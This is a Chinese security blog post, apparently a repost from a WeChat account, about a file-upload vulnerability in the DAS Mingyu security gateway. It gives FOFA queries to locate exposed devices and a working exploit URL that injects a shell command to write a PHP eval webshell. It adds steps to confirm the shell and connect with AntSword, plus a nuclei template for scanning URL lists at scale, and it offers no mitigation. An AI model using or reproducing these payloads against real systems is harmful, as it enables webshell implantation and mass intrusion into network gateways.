安恒明御安全网关文件上传

admin 2024年2月23日04:21:38评论16 views字数 988阅读3分17秒阅读模式

安恒明御安全网关文件上传

「fofa语法」

安恒明御安全网关文件上传
# FOFA语法title=="明御安全网关"body="/webui/images/basic/login/" && title=="明御安全网关"

「漏洞复现」

安恒明御安全网关文件上传

步骤一:随便搞一个网站过来并拼接以下路径回车访问,如果出现以下页面内容则说明存在文件上传漏洞....

http://IP/webui/?$type=1&bkg_flag=0&g=aaa_portal_auth_local_submit&suffix=1|echo+%22%3C%3fphp+eval($_POST[%22a%22])?%3E%22+%3E+.xxx.php

安恒明御安全网关文件上传

步骤二:以上POC则是写入了一句话木马到目标服务器中名字为.xxx.php...这里可借助Hackbar来验证!!!

# 请求路径http://IP/webui/.xxx.php

# POST发送数据a=phpinfo();

安恒明御安全网关文件上传

步骤三:直接使用蚁剑连接成功...

安恒明御安全网关文件上传

安恒明御安全网关文件上传

「程序编写」

安恒明御安全网关文件上传
id: mingyu_uploadinfo:  name: mingyu_upload  author: joyboy  severity: critical  description: http://xxx.xxx.xxx/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval($_POST["a"]);?>"+>+.xxx.php  metadata:    max-request: 1    fofa-query: title="明御安全网关"    verified: true    CVE:   tags: 明御安全网关,uploadfile

requests:  - raw:      - |        GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval($_POST["a"]);?>"+>+.xxx.php HTTP/1.1        Host: {{Hostname}}    matchers:      - type: word        part: body        words:          - 'success'
# nuclei执行命令nuclei.exe -t mingyu_upload.yaml -l url.txt -stats

原文始发于微信公众号(揽月安全团队):安恒明御安全网关文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日04:21:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安恒明御安全网关文件上传https://cn-sec.com/archives/2123702.html

发表评论

匿名网友 填写信息